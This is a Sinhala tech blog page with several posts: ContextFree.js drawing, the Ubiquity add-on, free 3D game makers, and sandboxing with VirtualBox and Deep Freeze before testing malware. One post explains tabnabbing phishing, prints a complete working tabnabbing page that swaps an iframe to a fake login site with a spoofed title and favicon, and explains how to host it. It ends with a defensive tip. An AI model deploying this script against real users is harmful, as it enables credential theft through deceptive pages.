අලංකාරය සහ සැපපහසුව - javascript සමඟ පට්ටම චිත්‍ර ඇඳීම සහ Ubiquity ප්ලගිනය

4

Share/Bookmark
ඊට ඉස්සෙල්ලා පොස්ට් එකේ දැම්ම "azarask.in" වෙබ් අඩවියේ තිබිලා තමා මේදෙන්නත් හම්බ වුනේ . මේකත් පස්සේ දාන්න තිබ්බොත් අමතක වෙයි කියලා හිතලා ඉක්මනට දාන්න හිතුණා . javascript සමඟ චිත්‍ර ඇඳීම ගැන කථා කරනවා නම් මෙයට කියන්නේ Algorithm Ink කියලා.  garupale



ඔයාලට web based demo එකක් http://azarask.in/projects/algorithm-ink/ බලාගන්න පුලුවන් . ඔයාලට මෙයින් චිත්‍ර අඳින්න වගේම ඒවා පින්තුර ලෙස save කරගැනිමේ හැකියවත් ලබාදී තිබෙනවා .මතක තියාගන්න මේක Internet Explorer වල run වෙන්නේනෑ , ඔයාලට හොඳට බලන්න ඕනේනම් firefox දාලා බලන්නකෝ.මම web based demo එක ඔයාලෙගේ වෙබ් අඩවියට දාන්න පුලුවන් විදිහට script එක එකතු කරලා ගත්තා . ඒක ඔයාලට http://www.mediafire.com/?jymammzkzrc මඟින් භාගත හැක .




 A Peak at the Syntax

The grammar is pretty simple. Let’s start by making a circle:
startshape shape
rule shape{
 CIRCLE{}
}
This says start by drawing the rule named “shape”. The rule shape says to draw a circle.

Now let’s make things more interesting:
startshape shape
rule shape{
 CIRCLE{}
 shape{ s .5 b .2 x -.25 }
}
We’ve added a single line which says that part of the rule for “shape” is to draw itself, scaled down by half, with a slightly increased brightness, drawn on the left side of its parent circle. This makes an off-centered bulls-eye pattern.

Now let’s go to the right, as well as the left:
startshape shape
rule shape{
 CIRCLE{}
 shape{ s .5 b .2 x -.25 }
 shape{ s .5 b .2 x .25 }
}

For comparison, this is what the equivalent code in Processing.js looks like:
// Processing.js code to make the same circle pattern.
void setup()
{
  size(200, 200);
  noStroke();
  smooth();
  noLoop();
}
void draw()
{
  drawCircle(126, 170, 6);
}
void drawCircle(int x, int radius, int level)
{
  float tt = 126 * level/4.0;
  fill(tt);
  ellipse(x, 100, radius*2, radius*2);
  if(level > 1) {
    level = level - 1;
    drawCircle(x - radius/2, radius/2, level);
    drawCircle(x + radius/2, radius/2, level);
  }
}
It’s much longer, involves more setup, and more fiddly calculations. In fact, the entire ContextFree.js source is as long as the setup function. Of course, by simplifying so much in ContextFree.js, we’ve also removed the flexibility Processing.js affords.
Adding one more line of code gives an unexpected result: The Sierpinski Triangle. I’ll leave it as an exercise for the reader to figure out what that line of code is, but I doubt that it will be much of a puzzle.

Follow the mouse

The equivalent of “Hello, World!” for a graphical environment is a dot that follows the cursor, replete with a fading trail. This is what it looks like in ContextFree.js:
startshape DOT
rule DOT{
  SQUARE{ s 4 b 1 a -.9 }
  SQUARE{ s .3 }
}
rule MOUSEMOVE{
  DOT{ }
}
We start by defining the rule “DOT” which draws two things: A large square (scaled up 4x), which is white (brightness of 1), and mostly transparent (alpha of -.9), and then a smaller black square. The large transparent white square acts to fade out more and more of the previous DOTs that have been drawn (it’s a standard trick for doing motion blur effects). The rule MOUSEMOVE simply draws a dot at the current mouse position, whenever the mouse moves.
Here’s the result.
මෙයට යොදාගෙන තිබෙන script කට්ට ඔයාලට http://code.google.com/p/contextfree/source/browse/trunk/
වෙතින් භාගත හැක . මෙය මෘදුකාංගයක් ලෙස ඔයාලට http://www.contextfreeart.org/mediawiki/index.php/Download_page වෙතින් භාගන්න පුලුවන්. 



 2. අනික් ටුල් එක තමයි  Ubiquity . මේක එන්නේ firefox වලට විතරයි . FireFox user කෙනෙක් නම් අනිවාර්යෙන්ම තිබිය යුතු plugin එකක් තමයි මේක . හිතන්න අපිට e-mail එකක් යවන්න ඕනේ කියලා . අපිට e-mail එක යවන්න නම් අපි මුලින්ම අපේ mail client එකට ගිහිල්ලා mail එකක් හදලා යවන්න එපැයි . නමුත් මේක අපිට script එකක් ලියලා ඕනෙම නම් කරගන්නත් පුලුවන් . නමුත් හිතන්න අපිට පුලුවන් නම් e-mail යවන්න කියලා අපි browser එකට සරල භාශාවෙන් කියුවාම e-mail එක යවනවා නම් කොච්චර ආතල්ද ??? , අන්න ඒ වගේ වැඩක් තමා Ubiquity මඟින් සිද්ධ වෙන්නේ .......  මෙය web browser interface  එක හා platform එක අතරමනා සම්බන්ධතාවයක් (සන්නිවේදනයක්) නිර්මාණය කිරිමේ මුලික අඩිතාලමක් ලෙස තමා මේ තාක්ශණය කරලියට පැමිනෙන්නේ . ම්ම බොරුද කියන්නේ කියලා ඔයාලා පහත විඩියෝ එක බලලම ඉන්නකෝ , එතකොට තේරෙයි (*මෙක අනිවාර්යෙන්ම බලන්න හොඳේ).  garupale



ඔයාට මෙයhttps://addons.mozilla.org/en-US/firefox/addon/9527 භාගත කරගන්න පුලුවන් .
වැඩිපුර :


 මොකද හිතන්නේ මේ ගැන , ඔය පහළින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!! garupale
ඉතිරිය කියවන්න .....>>

Tabnabbing - Phishing කලාවේ අලුත්ම පෙරලිය (*තවත් එක් හැකින් ක්‍රමයක්)

7

Share/Bookmark

හෙට පෝය නිසා අද ටිකක් රිලැක්ස් , හෙට උදේ ක්ලාස් , රෑට දන්සලේ වැඩ ...... garupaleහරි හරි මම ආව කාරනය අද කියන්නම්කෝ . මම ඔය හැකින් ගැන නිකන් හොයන වෙලාවට යන එක වෙබ් අඩවියක් තමා techotips.blogspot.com කියන්නේ . අද ගියහම තිබ්බා tabnabbing කියලා article එකක් , මාත් බැලුවා මොකක්ද මේ අලුත් නම කියලා . බැලින්නම් අලුත්ම phishing ක්‍රරමය තමා tabnabbing . මෙකෙන් මුලිකවම කරන්නේ අපි web browser එක tab එකක් දාලා වෙබ් අඩවියකට ගියා කියමුකෝ , හිතන්න අපි ගිය වෙබ් අඩ්වියේ මෙම phishing එක සිදුවෙන script එකක් ඇතුලත් වෙනවා කියලා . දැන් අර මම open කරපු මුල්tab එක තියලා , තව tab කිහිපයක් උපයෝගි කරගෙන මගේ වැඩටික කරනවා . නමුත් මෙම වෙලාවේදි අර script එක ඇතුලත් වෙලා තිබ්බ වෙබ් අඩවිය වෙනත් වෙබ් අඩවියකට (හිතන්නකෝ බොරු yahoo , gmail , facebook login page එකකට කියලා) යනවා . නමුත් මම දන්නවා මම ඒ වෙලාවේ ඒ tab එක ඔපන් කරලා තිබ්බේ ඒක නිසා මම එහි URL එක බල බ්ල ඉන්නේ නෑ , කෙලින්ම මගේ අදාල විස්තර ටික ඇඳලා දානවා hah. එතකොට තමා අපිට කෙලවෙන්නේ . මට ඔය පැහැදිලි කිරිම් කරන්න හරි අමරුයි අප්පා , ඔයාලත පහත විඩියෝ දාලා බලන්නකෝ එතකොට තේරෙයි . garupale



දැන් තේරෙනවා නේද වැඩේ කොහොමද වෙන්නේ කියලා . මම source code එකත් බැලුවා , වැඩේ නම් සරල logic එකකට තමා වෙන්නේ . මට මෙතැන source code එක දාන්න බැ , virus guard වලින් අල්ලනවා virus කියලා , ඇත්ත කියුවොත් මේකේ විරුස් එකක් නෑ , වෙන්නේ අර ටැබ් ගොඩක් open වෙලා තියන වෙලාවට වෙබ් අඩ්විය වෙනස්වීම පමණි .මෙක හොයාගෙන තියන්නේ ඔය mac එක හොයාගත්ත මහත්තයාගේ පුතා (Aza Raskin) කියලා තමයි සඳහන් වෙන්නේ . ඔයාලත් එයාගේ බ්ලොග් එකට ගිහිල්ලා බලන්නකෝ .(http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/ , ආ කියන්න අමතක වුනා මේ අඩ්වියට යන කොට මෙයා මේ බ්ලොග් එකේ script එක දාලා තියනවා අපිට demo එකක් වගේ පෙන්නන්න .ඒ වෙලාවට virus gurad එකෙන් අල්ලයි virus කියලා , ඒකට බයවෙන්න එපා හොඳේ !!).


ම්මත් මේ demo එකක් හැදුවා , ඒක ටිකකට කලින් delete කරලා ( free hosting නේ ) . ඔයාලට ඔයාලගේ වෙබ් අඩවියකට මෙය දාන්න ඕනෙම නම් කරන්න තියන්නේ මෙහි .js (javascript file එක) ඔයාලගේ web hosting service එකකට upoload කරලා , වෙබ් අඩ්වියේ <script>
tag එක මඟින් javascript එක කෝල් කිරිම පමනයි . garupale



script එක භාගත කරගන්න : http://bit.ly/da4qVT (http://www.azarask.in/projects/bgattack.js)

උදා : (දැනට මෙම script එක මෙහි නිර්මාතෘගේ වෙබ් අඩවියේ තියන නිසා මම මෙම script එක එහි සිට කොල් කරනවා) . පහත කේතය text file එකක දාලා " anyname.html" ලෙස save කරලා ඕක tab කිහිපයක් ඕපන් කරලා බලන්නකෝ . yoursite.com/phishing.javascript.js එක javascript එක තියන තැනට වෙනස් කරන්න . )

කේතය :


<html><head> </head><body><h2> Testing tabnabbing </h2><script type="text/javascript" src="yoursite.com/phishing.javascript.js"></script> </body></html>

තව ඕක ක්‍රමය වැඩිදියුණු කරලා , ඒ කියන්නේ tabnabbing සහ iframe භාවිතා කරලා ගේම දෙන විඩියෝ ඒකකුත් දැක්කා youtube එකේ .ඕං ඒකත පහත දාලා ඇති බලන්නකෝ , බලලා පහලින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!



විඩියෝ භාවිතා වු කේතය (tabnabbing & iframe) :

<html><head><title></title></head><style type="text/css">html {overflow: auto;}html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}</style><body> <script type="text/javascript">//----------Set Script Options--------------var REAL_PAGE_URL = "http://google.com/"; //This is the "Real" page that is shown when the user first views this pagevar REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"var FAKE_PAGE_URL = "http://www.hackyeah.com"; //Set this to the url of the fake pagevar FAKE_PAGE_TITLE = "HackYeah"; //This sets the title of the fake pagevar REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.var FAKE_FAVICON = "http://www.hackyeah.com/favicon.ico"; //Set's the fake favicon.var TIME_TO_SWITCH_IE = "4000"; //Time before switch in IE (after tab changes).var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching (does not account for tab focus) .//---------------End Options-----------------var TIMER = null;var SWITCHED = "false"; //Find Browser Typevar BROWSER_TYPE = "";if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){ BROWSER_TYPE = "Internet Explorer";}//Set REAL_PAGE_TITLEdocument.title=REAL_PAGE_TITLE; //Set FAVICONif(REAL_FAVICON){ var link = document.createElement('link'); link.type = 'image/x-icon'; link.rel = 'shortcut icon'; link.href = REAL_FAVICON; document.getElementsByTagName('head')[0].appendChild(link);} //Create our iframe (tabnab)var el_tabnab = document.createElement("iframe");el_tabnab.id="tabnab";el_tabnab.name="tabnab";document.body.appendChild(el_tabnab);el_tabnab.setAttribute('src', REAL_PAGE_URL); //Focus on the iframe (just in case the user doesn't click on it)el_tabnab.focus(); //Wait to nab the tab!if(BROWSER_TYPE=="Internet Explorer"){ //The tested versions of IE blur the iframe on tab change el_tabnab.onblur = function(){ TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE); } el_tabnab.onfocus= function(){ if(TIMER) clearTimeout(TIMER); }} else { setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);} function TabNabIt(){ if(SWITCHED == "false"){ //Redirect the iframe to FAKE_PAGE_URL el_tabnab.src=FAKE_PAGE_URL; //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;  //Change the favicon -- This doesn't seem to work in IE if(BROWSER_TYPE != "Internet Explorer"){ var links = document.getElementsByTagName("head")[0].getElementsByTagName("link"); for (var i=0; i<links.length; i++) { var looplink = links[i]; if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") { document.getElementsByTagName("head")[0].removeChild(looplink); } } var link = document.createElement("link"); link.type = "image/x-icon"; link.rel = "shortcut icon"; link.href = FAKE_FAVICON; document.getElementsByTagName("head")[0].appendChild(link); } }}</script> </body></html>

මේකෙන් බේරෙන්න තියන හොදම ක්‍රමය තමා browser එකේ password manager එකක් දාගෙන භාවිතා කිරිම . ඔය Secure login (https://addons.mozilla.org/en-US/firefox/addon/4429/)වගේ හොඳයි . garupale
ඉතිරිය කියවන්න .....>>

ආතල් එක - තමන්ගේම කියලා 3D ගේම් එකක් , ගේමක් නැතුව සදා ගැනිම

15

Share/Bookmark
හාආආආආආආ හුඟ කාලෙකට පස්සේ , හුඟකාලයක් ගිහිල්ලද අනේ මන්දා , මට අද ටිකක් කචල් වගේ............... . putuscinte අද මම කියන්න යන්නේ මම මේ දවස් වල හෝ ගාලා කරලා ඉවරකරපු වැඩේ ගැන . මගේ අතිජාත මිත්‍රයෙකුට මරු වැඩක් වුණානේ. මරු වැඩේ තමා අපේ A/L project බාරදෙන්න කියලා විභාගයට ලබන මාසෙට ඉස්සෙල්ලා , නමුත් මගේ යාලුවා project කරලා තියා ඒකට අතගහලාවත් නෑ . දැන් මු අඬ අඬ ආවා මගේ ගාවට අනේ මචං මොකක්හරි කරලා දිපංකො කියලා ඉක්මනට nangih . මා ගාවත් මුකුත් තිබ්බේ නැති නිසා (දන්න කියන අක්කලා /අයියලගේ projects හැමතැනම ගිහිල්ලා නොවෑ එක එකා ඉල්ලගෙන) මමත් දහ අතේ කල්පනා කරා මොනවද කරන්නේ කියලා , ටික වෙලාවකින් මම ඇහුවා මැසිමේන් ජිල්මාට් එකක් දාලාදෙන්නද කියලා . ඌත් හරි හරි කියලා දවස් 4 කින් කොහොමහරි වැඩේ කරලා දිපං කියලා ඌ ගියා . මමත් දැන් දහ අතේ කල්පනා කරා , මුට ගැලපෙන දවස් 4 කින් ඉක්මනට කරන්න පුලුවන් වැඩක් මොකක්ද කියලා (*මුට කෝඩින් ටිකක් විතර පුලුවන් ). මම බැලුවා කෝඩින් වලින් මොකක් හරි කරලා දාන්න .පස්සේ මුලු හාඩ් එකම පීරලා බැලුවා දවස් 4 කින් විතර ඉවර කරන්න පුලුවන් projects තියේද කියලා , මගේ කරුමෙද මන්දෙන්නේ නෑ මට එක මඟුලක්වත් හම්බවුනේ නෑ (කරලා තියන ඒවා එක්කෝ වැඩක් නෑ , එක්කෝ දවස් 4 කින් ඉවර කරන්න බෑරි එකක් , නැතිනම් කොහේහරි අම්බානක හිරවෙච්ච ඒවා තමා මා ගාව තිබුනේ) . මම හාඩ් එක පීරන කොට මම flash වලිනුයි , game maker එකෙනුයි බාගෙට හදලා ඉවරකරපු projects 3 -4 තිබ්බා , වැඩේත් project එකකට ගලපෙන නිසා මමත් දැම්මා බොක project එකක් විදිහට game එකක් හදන්න. වැඩේට අතගහන්න ඉස්සෙල්ලා ගියා youtube එකට බැලුවා game maker වගේ තියන tools මොනාද කියලා . අපේ ඊලඟට තමා මගේ දෙයීයව දැක්කේ . "3D RAD - Free 3D Game Maker" දැක්කේ ගත්තා ටුල් එක game එක හදාගෙන ගියා දඩබඩ කියලා .ගියේ දවස් 3 යි . ගේම් එක නම් පොඩි කාර් ගේම් එකක් . car models 5 යි , tracks 8 යි . පට්ට ලෙහෙසි වුනා හදන්න . අද තමා ඉවර කරලා අරුට දුන්නේ . ඉතින් හිතුණා මේ ගැනත් ලිපියක් ලියන්න . අද මම කියන්න යන්නේ අපිට තමන්ගේම කියලා 3D ගේම් එකක් ලෙහෙසියෙන්ම හදාගන්න පුලුවන් ටුල්ස් කිහිපයක් ගැන ............... hah

1. 3D RAD - Free 3D Game Maker (මගේ ලව් එක ....)

මේක ගැන කියනවා නම් පට්ටම ටුල් එකක් තම්යි මේක . තනිකරම අපිට ගේම් එකක් කියලා හදාගන්න ඕනේ කරන models මෙහි දී තිබෙන අතර අපට අවශය ලෙස දි ඇති models යොදාගෙන ඉතාඉක්මනින්ම ගේම් එකක් නිමා කල හැක. මෙහි ටුල්ස් 2 ක් තිබේ. එනම් අප ගේම් එක හදන පරිසරය ඇතුලත් editor එක හා editor කෙන් හදාගත් කොටස compile කොට exe බවට පත්කරන compiler එකය . editor එකෙහි භාවිතය ඉතා සරල වන අතර ඕනැම අයෙකුට ඉතා ඉක්මනින්ම ඉගෙනගත හැක. hah




පහත විඩියෝ එක බලන්නකෝ , එතකොට ඔයාලට තේරෙයි . tool එක ගැන නම් තියන intro විඩියෝ එකක් හොයාගන්න අමාරු උනා , ඒ නිසා පොඩි model එකක් හදලා රන් කරන විඩියෝ කට්ටක් දැම්මා





ඔයාට මේ කිරිටොයියාව "http://www.3drad.com" වෙබ් අඩවියෙන් ලබාගන්න පුලුවන් .

2. Platinum Arts Sandbox - Free 3D Video Game Maker



මේක ගැන කියනවා නම් මේකත් මරු ටොයියා . මෙයාගෙත් කාටත් පාවිච්චි කිරිමට පහසු අතුරුමුහුනතක් තිබෙන අතර මෙමඟින් ඉතා ලෙහෙසියෙන්ම ගේම් එකක් නිර්මාණ්යා කරගත හැක. මම මේකට නම් අතගහලා වැඩේ දවස්ක් නෑ , දවස් 2 ක්විතර ඇති . නමුත් මෙයින් නිපදව්න models ඉතා අලංකාර වන අතර එම models වලට සීමාසහිතව වෙනස්කම් කලහැක. වෙනස්කම් කිරිම සීමාසහිත වුවත් garaphic වලින් වැඩි සාමානය ගේමක් නිර්මණ්ය කරගැනිමට මෙමඟින් හැකියාවක් ඇත . garupale



මෙය භාගත කරගැනිමට " http://sandboxgamemaker.com/ " වෙත යන්න .

3.Gamemaker by YoYo Games


මේක තමයි මම මුලින්ම flash වලින් පස්සේ game හදන්න බැස්ස ටුල් එක , මෙය අනෙක් ටුල්ස් එක්ක සැසඳු විට මෙහි අප සදාගන්නා models අපට අවශය ලෙස වැඩි වෙනසිකමක් කිරිමේ හැකියාව ඇති අතර , අනෙක් ටුල්ස් මෙන් මෙහි අතුරු මුහුණත නවකයෙකුට අල්ලාගැනිමට මඳක් අපහසු වනු ඇත (මීට ටිකක් පුහුණුව අවශය , නමුත් මෙහි ඇති අතුරු මුහුණත මඟින් අපට අවශය වැඩේ ඉක්මනින්ම කරගැනිමෙ හැකියාව ලබාදි තිබේ). මෙහි free version එක මඟින් 2D ගේම්ස් නිර්මාන්ය කරගත හැකි අතර මෙයින් 3D ගේම්ස් නිර්මාණය කරගැනිමට මෙහි pro version එකට යා යුතුවේ . 3D ගේම්ස් නිර්මාණය යනවිට මෙහි buit-in කේතන භාෂාවක් තිබෙන අතර , එය Game Maker Language (GML) වේ . මෙය C++ , java වැනි object oriented programming language වලින් සැදුම්ලත් එකක් වන නිසා මෙම භාෂාව බොහෝදුරට C++ , java වලට සමාන වේ . garupale




GameMaker භාගත කරගැනිමට " http://www.yoyogames.com/ " වෙත යන්න .

4. Reality Factory - Games Without Programming


මේකත මරු කිරිටොයියා . ගොඩක් යොදාගන්නේ first person shooter ගේම්ස් හදන්න තමා. තනිකරම models හැදීමට පහසුකම් සලස ඇති අතර ගේම් එක නිර්මාණය සඳහා වැඩි පහසුකම්ද සලසා තිබේ . model එකක් සදා ගැනිමෙදි එම model එක අපට අවශය ලෙස සකස් කිරිමට උඩින් , පැත්තෙන් ,කෙලින් යන පැති වලින් එකවරම බැලිමට ඇති හැකියාව මෙහි ඇති සුවිශේෂත්වයකි . garupale

ආ කියන්න අමතක වුනානේ මම මෙහි නවතම සංස්කරණය භාගත කරගත්තත් එහි ඇති දෝශයන් හේතුකොටගෙන මෙහි සමහර tools ධාවනය කිරිමෙදි යම යම් errors මතුවුණා , මම මේකේ update එකත් දාල බැලුවා , අවුල් ගොඩයි . ඒක නිසා මෙහි නවතම සංස්කරණයට භාගත කරගත් පසු අපහසුතා පැමිනියහොත් නවතම සංස්කරණයට පෙර සංස්කරණය භාගත කරගෙන භාවිතයට ගන්න .

ඔයාලට මෙය http://www.realityfactory.info/cms/downloads/category/1-main-installer.html මඟින් භාගත කරගත හැක . පරන සංස්කරණය http://www.stormthecastle.com/video-game-design/reality-factory/reality-factory-download.htm හාගත කරගත හැක .









ඉහත විඩියෝ 3 සඳහා අවශය සියලුම තොරතුරු http://www.tinkernut.com/forum/video-tutorial-help/how-to-make-a-free-first-person-shooter-part-1 මඟින් ලබාගත හැක . hah


5. The Game Creators


මේකත් පට්ට භාණ්ඩය . මෙයාලගේ products 3 ක් තියනවා . පලමු එක තමා තොත්ත බබාලට ගේම් හදන්න 3D Game Maker , සාමාන‍ය ගේම් එක හදන්න Dark Basic භාවිතා කල හැක, තව්ද C, C++ , VB වලින් කෙතයන් කල හැකි අතර , කේතය කීරිම් අකමැති අයට FPS Creator තිබේ . ටිකක් profesional විදිහට ගේමක් හදාගන්න ඕනේ නම් මෙහි ඇති ටුල්ස් සෙට් එක මරු ~~ . garupale






මෙහි ඇති ටුල්ස් භාගැනිමට http://www.thegamecreators.com වෙත යන්න .

අපෝ දැන් මට ඇති වගේ (අනේ මට කම්මැලියි , මෙක තව කොටන්න බැරියෝ nangih ), තව ඕනේ තරම් ටුල්ස් නෙට් එකේ තියනවා , මම දෑම්මේ මට අල්ලලා ගිය ට්කක් තමා . අන්තිමට ඔයත් game developer කෙනෙක් වෙන්න කැමති නම් පහත විඩියෝ එකත් බලලා කොමෙන්ට් එකක් පහලින් දාලම යන්නකෝ !!! garupale



*මොකද හිතන්නේ මේ ගැන , ඔය පහළින් කොමෙන්ට් එකක් දාලම යන්නකෝ !!! garupale
ඉතිරිය කියවන්න .....>>

ලව් ස්ටොරිස් - ජංජාලයේ ලව් ස්ටොරිස් කොලෙක්ෂන් එක .......

24

Share/Bookmark
                     ~ දැනුම්දීමයි ~

අඩේ මෙක හදිස්සියට දාන්නේ , මෙම වෙබ් අඩවිය ලෝඩ් විමේ අපහසුතා ගනණාවක් පසුගියදා වාර්තා උනා . හේතුව ලව් ස්ටෝරි කොලෙක්ශන් එකට XML (template) එකේ scripts බොහෝ ප්‍රරමානයක් දමා තිබෙන අතර මෙහි ඈති තාක්ශණික ලිපි බැලිමට එන එම අනවශ‍ය scripts ලෝඩ් විම නිසා අපහසුතාවයක් සිදුව තිබෙන බැවින් මෙහි ඇති ලව් ස්ටොරි කොලෙකශන් එක වෙනත් වෙබ අඩවියකට ගෙනගිය බව කරුණාවෙන් සලකන්න. මෙහි වැඩි පහසුකම් සහිතව මෙම සේවාව ලබාදෙන්න බලාපොරොත්තු වෙන අතරම දැනටමත් මෙහි නවතම සිංදු ඇසිමේ පහසුකම ලබා දී තිබේ . මා හට ඉදිරියට තිබෙන විභාග කටයුතු , අනෙක් කටයුතු නිසා බ්ලොග් කිරිමේ කාලය සීමා වන අතර මෙම සේවාව දිගටම පවත්වාගෙන යාම සඳහා වෙනත් අයගේ සහය ලබාගැනිමෙ අදහසක්ද පවතී , මෙය ගැන ඉදිරි අනාගතයේ දැනුම් දෙන්න බලාපොරොත්තු වෙන අතර  , ඔබට "http://sllovespot.blogspot.com" නව ලිපිනය ඔස්සේ මෙම අඩවියට යා හැක .

     ස්තුතියි ,
~ හිඟන්නා ~
ඉතිරිය කියවන්න .....>>

ගේම දිමට පෙර ආරක්ශාව - තමන්ගේ මැසිම virus , trojans ටෙස්ට් කරන්න සදාගන්නේ කෙසේද ?

11

Share/Bookmark
අද මට මාර වැඩක්නේ වුනේ , අද මගේ fb එකේ හොඳ බැනලා එවපු msg ගොඩයි , මම බැලුවා මේ මොකද යකෝ මේ කියලා garupale. බැලින්නම් මගේ ඊට ඉස්සෙල්ලා ලව් ස්ටෝරි කොලෙක්ශන් පොස්ට් එක මාර විදිහට හිට් වෙලා නිසා , සයිට් එකට අලුත් කට්ටියක් හිට් වෙලා , සෙට් වෙලා !! ; පස්සේ අලුතෙන් හිට් වුන කට්ටියගෙන්ද දන්නේ නෑ මේකේ හැකින් ගැන තියන ටුල්ස් එහෙම නිකම්ම මැසිමේ ටෙස්ට් කරලා , අර කියන ටුල්ස් රන් කරලා වෙන ඒවා ට්‍රයි කරන්න ගිහිල්ලා මැසිම් වලට virus , trojan දාගෙන අනාගෙන මට හොඳවයින් බැනලා !!!; අනේ අසරණ මම ............ garupale( * මම ලියලා තියන, කියන හැම ටුල් එකක්ම මම virtual pc එකක තමා ටෙස්ට්න් දාන්නේ , ඉතින් මට මේක හැම පොස්ට් එකකම ලියන්නත් බැහැ මතක් කරකර , අනික මේක ගැන මට මුලින්ම කියන්න මතක වුනා ; සොරි හොඳේ !!! soal ).



ඉතින් අපෝ මට තවත්අයගෙන් බැනුම් අහන්න බැරි නිසා මම තව හැකින් ලියන්න ඉස්සෙල්ලා අනිවා හිතුව මේ ගැන ලියන්න. මුලිකවම මම ගන්න හැම tool එකක්ම ටෙස්ට් කරන්න යොදාගන්නේ virtual pc එකක් හෝ deep freeze වල තමා . මේ සබ්ජේක්ට් එකට අලුත් අයටත් දැනගන්න ලෙහෙසි වෙන්නත් එක්ක මම හිතුවා සරල ලිපියක් දාන්න , වැඩි වැල්වටාරන් නැතුව virus , trojans ටෙස්ට් කරන්න ඉස්සෙල්ලා තමන්ගේ මැසිම කොහොමද හදාගන්නේ කියලා . මුලිකවම මේකට අමුතු සුදානමක් ඕනේ නැ , මම මේ වගේ වැඩ වලට භාවිතා කරන tools කිහිපයක් පිලිබඳ පොඩි දැනුවත් කිරිමක් තමා මෙම ලිපියෙන් ඉදිරිපත් කරන්න බලාපොරොත්තු වෙන්නේ .

1 මුලිකවම වැඩිදෙනෙක් භාවිතා කරන tool එකක් තමා virtual pc එකක් කියලා කියන්නේ . මේකෙන් මුලිකවම කරන්නේ තමගේ පරිගනකය තුල කුමක් හෝ vitual pc support කරන මෘදුකාංගයක් හරහා virtual පරිගනකයක් තමන්ගේ පරිගනකයේ ධාවනය කිරිමයි . සරලව මෙහි ක්‍රියාකාරිත්වය ගැන කතාකරද්දි අපි virtual පරිගනකය තුල සිදු කරනු ලබන සියලුම ක්‍රියාකාරකම් virtual පරිගනකය තුල පමණක් සිදුවන අතර , මෙලෙස සිදු කරනු ලබන ක්‍රියාකරකම් වලින් සිදුවන සියලුම හානිකර බලපෑම් virtual පරිගනකයට පමනක් සිදුවේ . ඕනෑම vitual pc support කරන මෘදුකාංගයක guest os සහ host os ලෙස පිලිවෙලින් virtual පරිගනකයේ OS සහ තම ඇත්ත පරිගනකයේ OS එකට කියනු ලෑබේ . බොහෝ වෙලාවට viryual pc මෘදුකංග භාවිතා කරන්නේ එකම OS එක තුල OS කිහිපයක් (Multiple OS) ධාවනය කිරිම සඳහාය . මෙම සේවාව සපයන බොහෝ මෘදුකාංග වෙලදපොලේ තිබුනත් නොමිලේ , වැඩි ආරක්ශාවක් සහිතව වැඩේ කරගත හැකි මෘදුකාxගයක් ලෙස "Virtual box" හැඳින්විය හැක . මෙම මෘදුකාංගය ඔයාලට http://www.virtualbox.org/ හරහා භාගත කරගත හැක . මම විඩියෝ කට්ටක් කලා කොහොමද තමගේ පරිගනකයට virtual pc එක දාගෙන වැඩක් අල කරගන්නේ නැතුව කරගන්නේ කියලා garupale. මුලිකවම මේ විඩියෝ එකෙන් virtual pc එකේ Installation , Configuration , File Sharing & Networking යන කිහිපය ආවරනය වෙන්න තමා හදලා තියන්නේ .

Video Part 1



Video Part 2



2. ඊළඟ කිරිටොයියා තමා " Deep freeze " . මේක ඔයාලට http://www.faronics.com/en/DownloadEvaluationEditions.aspx භාගත කරගන්න පුලුවන් . Deep freeze මුලිකවම කරනු ලබන්නේ මුළු hard disk එකම freeze කරන අතර , එම වේලාවේදි අප සිදු කරනු ලබන සියලුම වෙනස්කම් virtual ලෙස පරිගනකට සිදු කරනු ලබන අතර පරිගනකය restart කිරිමෙන් පසු පරිගහනකයේ ඉහත කල සියලුම වෙනස්කම් සම්පුර්ණ්යෙන්ම නැතිවි නැවත යථාතත්වයට පත්වේ . hah

Deep freeze භාවිතා කිරිමේදි අප සැලකිළිමත් විය යුතු කරුණු කිහිපයක් පවතී . පළමු කරුණ නම් අපිට deep freeze control panel එකට යාමට අව්ශය නම් කලයුත්තේ system tray එකේ deep freeze icon එක ලඟට ගොස් "Shift' එක ඔබාගෙන left click එක double click කිරිම හෝ "CTRL+Shift+Alt+F6" ඔබන්න . ඊළඟ කරුණ නම් අපට permanently පරිගනකයට යම්කිසි වෙනස් කමක් සිදු කිරිමට අවශය නම් පලමුව deep freeze , boot thawed තත්වයට පත්කොට පරිගනකය restart කර අවශය වෙනස්කම් කරන්න . අනික් කරුන නම් deep freeze uninstall කරන්න ඕනේ නම් මුලින්ම deep freeze , boot thawed තත්වයට පත්කොට පරිගනකය restart කරන්න , ඉන්පසු deep freeze setup එක ධාවනය කර uninstall කරන්න . පහත පිංතුරයත් පොඩ්ඩක් බලන්න , එහි තිබෙනව deep freeze වල එක එක status කොහොමද පෙන්වන්නේ කියලා . ඊලග පහත් විඩියෝ කට්ටත් බලන්නකෝ කොහොම්ද deep freeze install කරගෙන අදාල වැඩකගන්නේ කියලා .







ආ කියන්න අමතක වුණා Deep freeze වුනත් හරියටම භාවිතා නොකලොත් හ්Aක් කරන්න පුලුවන් . http://www.youtube.com/watch?v=lX4LhBbSa-U ඔය විඩියෝ කට්ටත් බලන්නකෝ !! , blacktrack එකේ tools කිහිපයක් යොදාගෙන ගේම දෙන හැටි !! garupale

